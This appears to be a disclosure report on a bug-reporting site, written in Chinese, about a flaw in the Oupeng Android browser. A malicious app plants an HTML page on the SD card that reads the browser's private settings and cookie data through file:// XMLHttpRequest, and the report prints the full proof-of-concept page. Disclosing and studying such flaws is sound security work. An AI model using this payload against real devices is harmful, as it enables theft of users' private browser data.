### 简要描述:
向欧鹏浏览器发送请求要求打开一个页面时,在非root情况下,可获取欧鹏浏览器下的所有数据,包括cookie信息等,盗取之后可以发送给远程服务器。
### 详细说明:
可以通过一个app释放一个攻击html到sd卡上,然后该app打开欧鹏浏览器,执行这个文件html文件,路径为file:///mnt/sdcard/hehe.html。向欧鹏浏览器发送请求要求打开一个页面时,即可触发
hehe.html文件如下(如下是举例,还可以上传到服务器)
```
<html>
<body>
<script type="text/javascript">
function getRet() {
var request = false;
if(window.XMLHttpRequest) {
request = new XMLHttpRequest();
if(request.overrideMimeType) {
request.overrideMimeType('text/xml');
}
}
xmlhttp = request;
alert("ok");
//获取本地文件代码
xmlhttp.open("GET", "file:////data/data/com.oupeng.browser/shared_prefs/user_settings.xml", false);
xmlhttp.send(null);
var ret = xmlhttp.responseText;
alert(ret);
}
getRet();
</script>
</body>
</html>
```
### 漏洞证明:
能够上传隐私信息,例如cookie信息等等,造成隐私信息泄露
京公网安备 11010502034610号
暂无评论